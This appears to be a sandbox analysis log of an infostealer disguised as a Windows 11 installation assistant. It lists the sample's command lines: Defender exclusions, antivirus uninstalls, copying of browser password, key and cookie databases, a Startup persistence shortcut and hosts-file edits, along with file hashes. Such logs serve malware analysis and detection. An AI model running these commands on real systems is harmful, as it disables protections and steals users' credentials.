"C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe" /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe" /TI/ /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe
rp.EXE /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
C:\Windows\system32\rEg.EXE
"C:\Windows\system32\rEg.EXE" Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe" /TI/ /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe" /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
C:\Windows\system32\rEg.EXE
"C:\Windows\system32\rEg.EXE" Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe" /TI/ /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
C:\Windows\system32\rEG.EXE
"C:\Windows\system32\rEG.EXE" Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\.cmd""
C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr
"C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c CUrL -S ipINFO.io/Ip
C:\Windows\SysWOW64\curl.exe
CUrL -S ipINFO.io/Ip
C:\Windows\System32\Wbem\WMIC.exe
wmic product where name="Emsisoft Anti-Malware" call uninstall /nointeractive
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "emsisoft anti-malware" /f
C:\Windows\system32\cmd.exe
cmd /c "C:\Program Files\Malwarebytes\Anti-Malware\mbuns.exe" /uninstall /verysilent /f
C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr
"C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\qf16owjrosxtg1b240645453.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\1apee2pq240645453.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\oia5c9p871t240645453.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\936i6c2ysb240645453.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\foe3ysq410f240645453.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/ip6n9t5w.Admin\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\ncbfn8vuxc240664046.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/ip6n9t5w.Admin\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\t31j3c804mqki240664046.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/maevrvll.default-release\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\kxwijg5d0240672703.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/maevrvll.default-release\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\rosnq51ksrisakub240672703.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/maevrvll.default-release\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\irf37rj215240672703.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/maevrvll.default-release\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\0pg7b8xtdpt240672703.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/maevrvll.default-release\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\13s111wjws4240672703.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/maevrvll.default-release\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\ne9rtc7kbn240678812.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/maevrvll.default-release\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\iv06ldrfve1q240678812.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\9cfdnzmzgmbbf2240684187.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\mgec5fx5240684187.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\kgjwak4w4a2240684187.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\egswv9dl2ib240684187.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/ip6n9t5w.Admin\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\8pt5qxkvfy240684187.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/ip6n9t5w.Admin\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\vvk7o2jve6r240695546.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/ip6n9t5w.Admin\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\ikpx0390o67sm1ea240695546.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/maevrvll.default-release\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\suljw2nzvdw7df240704281.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/maevrvll.default-release\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\l6eg9f1n240704281.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/maevrvll.default-release\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\0lq3klkq240704281.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/maevrvll.default-release\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\smjburzfkimk240704281.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/maevrvll.default-release\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\j4pr1w7zv2vr9y240704281.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/maevrvll.default-release\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\znxydv4lvul240710640.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/maevrvll.default-release\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\u85hddtuaaf240710640.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\se04f8fucdzhku240717171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\2vjn29ve0d1jkuz240717171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Network\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\ayvb9hgj3a672r0r240717265.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\0hdirnbx21weo99240717265.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\gzqafmovbudy1ml240730390.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\am8xvjdg6ag240730390.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\pusyq5r1yzdsuc240730484.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\et4u53ajr3jt3xs1240730484.tmp\" -Force"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\Desktop\CompleteSkip.bin\" \"C:\Users\Admin\AppData\Local\Temp\jl6tlwvxond4iozcrp.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\ConvertWait.ico\" \"C:\Users\Admin\AppData\Local\Temp\8uyyafnohn9mx66riu90rzsz.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\DenyBackup.wmx\" \"C:\Users\Admin\AppData\Local\Temp\b3s9il2g35ebbgi0s4cw.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\DisconnectUnpublish.rle\" \"C:\Users\Admin\AppData\Local\Temp\ln0kp3k13g822j7pgwi07e3ff3bv.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\ExitGroup.emf\" \"C:\Users\Admin\AppData\Local\Temp\louixdfy8ktt19wkoopgduw34ca.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\FindSubmit.sql\" \"C:\Users\Admin\AppData\Local\Temp\l0fd5a3g6xav6isorkq8e.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\GroupImport.vsdm\" \"C:\Users\Admin\AppData\Local\Temp\i1qw1ikbvqg9kxzcjfru8dkwz7.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\InitializeDismount.reg\" \"C:\Users\Admin\AppData\Local\Temp\ou9yox96qaw23glh99sueu1fqaezg0.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\InvokeSend.vsd\" \"C:\Users\Admin\AppData\Local\Temp\lqkggrd2cdn6g4yklxp4orl6.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\LimitConvert.docx\" \"C:\Users\Admin\AppData\Local\Temp\7l3iznobp430kighpzlcwdx7r1f.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\Microsoft Edge.lnk\" \"C:\Users\Admin\AppData\Local\Temp\hrlp3i8jy8hujc48j9nxwo6xfj.tmp\" -Force"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipINFO.io | udp |
| US | 34.117.59.81:80 | ipINFO.io | tcp |
| DE | 152.199.19.74:80 | evcs-ocsp.ws.symantec.com | tcp |
| SE | 192.229.221.95:80 | evcs-crl.ws.symantec.com | tcp |
| N/A | 127.0.0.1:50238 | tcp |
Files
memory/2488-0-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/2488-2-0x0000000000401000-0x00000000004B7000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-7HM1N.tmp\Trojan.Win32.DelShad.tmp
| MD5 | 40627c5fe58bb5a60606e5be621af052 |
| SHA1 | c21ec14767478d0e4bd1184ad6c2c280e2d1342f |
| SHA256 | bd4cbba2f23b512fad5b0c84d2e9502e4bfea75cac78482d22036968e8224b42 |
| SHA512 | e418ed7c9768a4237622be7a53b761a45ca4d4cf37643fcfdf9cb2f200a95fc904b213fb1a37befb86e6ff93ae3c5ff0f39243305789236d4031e017ec99085d |
memory/5112-6-0x0000000000400000-0x000000000071D000-memory.dmp
memory/1092-9-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/1092-11-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/5112-13-0x0000000000400000-0x000000000071D000-memory.dmp
memory/2488-15-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/244-20-0x0000000000400000-0x000000000071D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\pik.exe
| MD5 | 78c269b72f5b1d9bd4654cef3fb4a986 |
| SHA1 | c44db702175e2d474e3221a0de14f01c1f35129b |
| SHA256 | ace03b12b8763bd8567425f288ded8f8f0d9acd62f81de17414bd300d21820ab |
| SHA512 | bc9abf69debc967df59e16491ec533ab59b997d8ea89d7ebc1ba0a04b319d5f3746cd9e22b8b2c10b4ce655fb5a813be08214e142e97107cb07222f7dc19bee5 |
memory/5004-186-0x0000000000580000-0x00000000005A6000-memory.dmp
C:\tmp\.vbs
| MD5 | 2e2fa9827b9d476133f122be9012408c |
| SHA1 | 3a3d0d1135f95227693a46a110312a3c1a177c51 |
| SHA256 | 184fb09c2a02a1e5d23c9abe64affd866a919b7b287622069371716223f3b1b6 |
| SHA512 | 2e4a431fca5dada81cb22af865b122635b9b93e89b3948e86a2d6dd0c4b8eadbcf594ea1fb817818738468a831ecac75d7247d226d4ce901a9aaec66bc2c0e89 |
C:\tmp\.cmd
| MD5 | dee7acbdbf3f448057dae93e28514690 |
| SHA1 | ae56d802230bc13e7663be388781d7d1aa1ef3d0 |
| SHA256 | 5ec9a6efe3c3451a967335bf7d7bcb2f916fc8ba81c0b1118018d079fbffb5ec |
| SHA512 | 77cdd3ab66e49267907e3711ab7878469976ba677a683bead7d5e63353b03164345aef0ca0dd5d124488eca7cfef1f64ebde363d76596ef882cb2c56e1f41504 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows11InstallationAssistant.lnk
| MD5 | 32d2f357b0c753c9f2ec48a46ace87a1 |
| SHA1 | 9d39ab688703afcb085e3185b0371117445622dd |
| SHA256 | 33c6d377b2859272f50d96a7f8d7ba5bcb61bc0078eb333bdd023bd3895f98fe |
| SHA512 | e5343d78d2cb68b70517893ce3f4ca3778dd83926cc7b403df320469ab58bb02dcaf3ec437db58f0cb43f667f95f2eb4d4382d1465193cbd8e3052bd0460c041 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 3d19ae65bc53c6aa833b82ca7fa61cd4 |
| SHA1 | a3b94891864abdc9a8fec3022b3df060923ead46 |
| SHA256 | fcdc3e57b51ed726d90fca4aa19ba09e2bdb7a04fd573bf854465883aa326e14 |
| SHA512 | 8e4e3b8efa9d05497a27e79b82238bd9864ce3e1226ade8358491697173e19f6a12f2f181c64b481cd211ec5231804e9c683d72e5d0cf74208b7adb7a80f6e9c |
C:\Windows\system32\drivers\etc\hosts
| MD5 | aba235b54047e7cb084612bb4da90487 |
| SHA1 | d82ce896f26da05719a159028c18a275ff7304c7 |
| SHA256 | d1437a37ed2e78fe4c82174a1981631a4710f023b4726f7431f7f3a02e209be0 |
| SHA512 | ee997aa717057b01d7ee0aaaddc05925caf4fc7a99f917c7a3b8ee472b926523501cdf26c1315b38463b368a329ec8f1bb47a22f07883b85bd183bbc39d7a7d9 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 1da12c8dc6dee2cf35786d7214c7c5cd |
| SHA1 | fe81b4162636a4f8ccc16d7ad8dd3e5c8165bc63 |
| SHA256 | 18396e55e85d07cc36c223bf7f30e3e2e2cb171e89313b622a6df041f1095333 |
| SHA512 | b465e1c2b1bd4ceb0a2f195c0666c6d4c3ec4b55131be652bfbdee8dff8c9b4f6f52b95ab7562b5ff669dd43e03996453563fc8a3a04ad9f33d141c1bf19f180 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | dae09e71a424a796e57972976432802e |
| SHA1 | 3190c52ba6422c5421f53b12d016cbaeaeafc14e |
| SHA256 | f89d667e7c4a1a85bba63ac8fb4eb4d55d442a323011f222d39b92308b4ecb62 |
| SHA512 | e96a6d8645ec1ea926d154c6ccb1ef6bf172e74a2301624d9de84200bb4c0d7fbe0404b7a0d362c9e1151889d18576bf1c17007b4260cf4b60d018b5506e0f7c |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 6193636e0937f9aa8d1a51760700fe36 |
| SHA1 | 0f31660fd9f0181c977d392c1af12d9ff4295f3b |
| SHA256 | a073d240b848ae572360eeb4a59493078121dd38e827152bb60b44b9b88d4000 |
| SHA512 | 899572343acb5a95fcca3325e6b0db1eaa759c8bfe05556cb1d6b3da7498c6e46e91d5a31dae067aaafeb37f776f601efe69481c1125cf1db57cd80d6034d544 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 9845dd85124401f5a66f558a8aca99b0 |
| SHA1 | bd1e578ff26e1f8ceac98a8e334cab116358ff1b |
| SHA256 | bd67f1c4cbd53fab37860e3039eb9f0d36f8d3d699c012ed73e0103300073eef |
| SHA512 | f6141adc9e43ea3fb70e63c38be2c5f49c7d68dd2121a5ff866665429cc78fbc11e6df9c9766901d3f6bdf7fa2dde43af6e46bf364fd9740d80268fdf59df33f |
C:\Windows\system32\drivers\etc\hosts
| MD5 | a61ea7aef83b5cf13a79f3261b754299 |
| SHA1 | 1b145d66880360213d9ebf1593aeb9146711500b |
| SHA256 | fc9d51689428140dd4cee3c9d5e7a85dbe2d38f8cbb182a453258de4866b533b |
| SHA512 | 3c73458b4532ccabf3996923d3d825626b5505b8f180e727d86fd7667b844e4022eced25c20507262182113d550f21a2b0f6d5acf2896a37e9ee894495ed33a4 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 65b958df30a0d5264a6960b43d1ba803 |
| SHA1 | c5486386da0209c11d769be8db9a250cf91761a9 |
| SHA256 | f1d5f0d18e1caea663ebd7a953904bf783ae1eaafa25f7a0fbec1a36d47eb55a |
| SHA512 | 7845885e7c2d57f44f61daaec63b33fec69c6e712b79286fd33a295a2408813c48d68d7bc70ed144f87e30644b3e214eaaaa1ebb9e70a0af2c509c5d6cfe269d |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 93c55af47cde7b357a50adeafa4b7e0b |
| SHA1 | afff2bdbe8b05cd4aa3a93062673d8798e474d7b |
| SHA256 | f21a0e37e0d2ba27fdf62153e591f51cb40aa78007c4f86b38ed116bd4cb70a2 |
| SHA512 | f407b6d54fbe6afc119d0fcecf1201ad785ee05f3c791150343f0cefbffec8b92b34f371ebb6b5d8d0e47b0ff3a6ad51dcf150d6ce6bb77eaef9c481a5fb1226 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 30153c993d05eba1f074f5426d06d6b6 |
| SHA1 | 6111f38cff97f5f315c84929030e16d5e8895c4c |
| SHA256 | 0da79bd7b13e8ede21f933b07dc131f5c6660c6dea05abd213c5210639b53527 |
| SHA512 | 23a262bf715090bf0011cc4a3eb859ed21ab1fd792b6d39ae0c29892afce3acacfae2be9aa3e1df0006def44d6b3fd2bd5755807e58efc819f29ef2cfdf8ab42 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 37266ef3483bf46b93fe8bd1b5ef0be0 |
| SHA1 | 5523aeeaef268f04d5e28ba2333395835078b9e2 |
| SHA256 | a7958ee25a7cb12da3b75b0f1108d3d8063d373846d5ec4a1d793b696a568ddb |
| SHA512 | ee3c1971740413c0a123c437b6ffaaa45c2bc487064f3f79a3a74f0e9118e66ed7d8b5e93dcf6a0656c3721dec217b7122f71d0c7663a1ee28943b3f2fe11675 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | ceffd1a4bd82dfd9ffcab66c348da323 |
| SHA1 | bfabe81531cadb591370eb6eaa5ade0ec8974e0c |
| SHA256 | 16108ca4ccf2d9b1f45e7eac33aa422200997465c8dac3ec8f8347aec5c51dde |
| SHA512 | e0fdfcdc72bb0b4194d4e994e04b528e67ab5b95a9d346da74a0f0e1d0aefa79d2a547892eacd29d5c9fbc4c8ffced4bd9dccdee8bee02c9d8e5ad5c6710e7a8 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 60c4a7e2cf4efaaa5dd1faf837dcbe8d |
| SHA1 | 1c21c8a9f1834affe9017e1843fa4bf8f8011624 |
| SHA256 | 1152acdf6b94a5d48d56b5cb78199be434106a5d223bbdce65c6a3d681296ff1 |
| SHA512 | 30043e461f3e1f9a19d24dc582d171a7b50cb9c60fbe03ece12eedbed3d41b745714327706c3e93265aab98f206fc144a7e03904465fcb19d9a681b8639a1e09 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | bb20ef9c5e8647b19e7af26229108c99 |
| SHA1 | ff642a69365bdf05364872d951ff5bf9c403a804 |
| SHA256 | ef63978031b34cdc4613db378395ce28f3cc7d35f318ac62f730f90edf181f44 |
| SHA512 | 914ace2948982c607c61293d79bef662446b5227eac258abfdf601ef8eb968680ba5ceca1319d0c32064c21ded5812c0b3319642749083d52ea8905da82bc22f |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 24ec3a554f64015482f0960b410d8bd0 |
| SHA1 | 475ff8b22800c59a3f7446e693eac5292532f39e |
| SHA256 | 1692df1cc5b0f58b7df9ab78821a06196b0466683983c8949cf6b01ef12b0df2 |
| SHA512 | 977a9a1984c06800487eef736a1a9061acb6f62c6aa66dba919339007aa973bbf9a10e51482bdb59e14ff646b2c85c6198e59211d116b148fb7ca1d53415f3e4 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 710e85ee4c7bf73f9c8e8b0e0224af55 |
| SHA1 | 61f0aae0865344c6f799cf489c02ec64cc50bdd3 |
| SHA256 | e5c6683bb998f821dc813fe05eed0e90a73dcc64589238370871ec2cf1e12246 |
| SHA512 | 5221fd39ceae5a40393884d03122e3023e8b8b46808ce47ced7e6bc416838e539109bed81c3f3bf1cbe9034a86cef08c3f3f791a04b5dc7762af0e5a9726fc27 |
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\.cmd
| MD5 | 22a845995279c76177c613100a58d134 |
| SHA1 | 5cc94610bcdba7b0d514b711852a6cdb56db3ae1 |
| SHA256 | ca30adad79ccd83b3dc79f26a58c1552559176f8a271237c6d4d7ccf307920c0 |
| SHA512 | 0a4a3eb765847ab66e847bb83202ee8ad5d8591659a8be9e3ed4b6863f3aac28f9d4f6e2d4ca5c5efe800cfe30d471122b2f96807c2735dde5c6ade16c064cad |
C:\Users\Admin\AppData\Local\Temp\is-D00HJ.tmp\tmp\rp.exe
| MD5 | 408dd6ade80f2ebbc2e5470a1fb506f1 |
| SHA1 | e00293ce0eb534874efd615ae590cf6aa3858ba4 |
| SHA256 | 4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71 |
| SHA512 | 4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0 |
C:\Users\Admin\AppData\Local\Temp\3u4w4e8q.tmp
| MD5 | a69e54b63a067cefab41736717e9348b |
| SHA1 | 96e00b5f3170d19d173e62b97c1691fac8edfb98 |
| SHA256 | c72184932dd0541095be4827e5f86b3db735cfc651f04b50a1cc783d9037d75d |
| SHA512 | 13385b98377cb664907a5189cbf63f575c86b5b705df2a458ae21c6fd63f6cbf77451e8f17b22af8921a3342f31445278cb8450e1cc58fe33eecffe81e56cdda |
C:\Users\Admin\AppData\Local\Temp\3u4w4e8q.tmp
| MD5 | 31c5a8d7f0d900bfff09d437a7457478 |
| SHA1 | c32f7abbc47949c340a2136bb8cc4787f05b1eff |
| SHA256 | 89da44ebaa36a31740f9dbc585cefc3f55cf725f7d8d745b44ba259f0a1d8455 |
| SHA512 | 0089a7e5e0c3d7b8a226775f30983e901b323846d5263366672390ebbbd9212bd72bdb87c7baeeb09c6438317a66f5ccfc20cd898579190e6bb7579dd1cd158a |
C:\Users\Admin\AppData\Local\Temp\aut8B1A.tmp
| MD5 | bdb4dcbcec51d9ee1afee83221921fee |
| SHA1 | 21d56a9334238297d1a09aba46043cc36c9e2d3c |
| SHA256 | 9e5d8505b986e40cce00707180334fead34c0c3b590c458305de89e4bbc85f75 |
| SHA512 | cad20e6355cfe1e42a4ee7f5350a033ec79b8ed2689d8c6fa11bb1c3ae2a99425f03d95312ed9daf5c2543fc7ce38239fca41700cbecbc02a007a669ffd81fa5 |
C:\Users\Admin\AppData\Local\Temp\aut8B19.tmp
| MD5 | c87a407a6decc862e3132efc8ab504c9 |
| SHA1 | 20cd713fa491119aabfd25a7cce7a8209098f903 |
| SHA256 | 439de9f662754bbcfc211658ce3f1c1730e85df199ed1e067940e28831d2c758 |
| SHA512 | 8bed0ca582ca5b46f0c6922995343388df0d84d063512308d3f58c31da1811cb2c47b87be0ce5de4a1fb8ce14f89f8f3197f31bb0ca989fa159514f6751e1832 |
C:\Users\Admin\AppData\Local\Temp\aut8B2B.tmp
| MD5 | 3886aae8ae30f288363ce4d2ac4f81c2 |
| SHA1 | 19441c886b57ed9f4650f614f0d93501d0a33e40 |
| SHA256 | 37f10f3d46a2886cac6169a398e91dd8cd0cfd06a7b6812e1afb68c4c031b9fd |
| SHA512 | b37aa26a5324723d9b8a7b919c3727565a1e1974ba1316093b59dbe4a75f5e0773288894d7abb403d65688e0e3f29ef4b48af7a8048e64fe36199bf8d371fb31 |
C:\Users\Admin\AppData\Local\Temp\2z3k7c2q.tmp
| MD5 | c857a930b241455b7961a16c96ddf256 |
| SHA1 | 40f6df790dc7bc1e7daa1f48a729453a2ffd9efa |
| SHA256 | b2023c405900d194c0a00ea1cabefa96f3abcb73c2da88c3802594811a128bbc |
| SHA512 | 702b4c9327cddd5d8baac050376143e42ac4632afb0e1b605a0d3a7d448a9f570296981b509f66cab56926a6c52bb8fd90b6014a89d433e3b8f41396b6fe7bcb |
memory/1092-486-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/244-488-0x0000000000400000-0x000000000071D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr
| MD5 | e9f5799bcca4695afee82c0781242577 |
| SHA1 | 240bf1ae93f432aef2a05daeed3299d12bd7e6f8 |
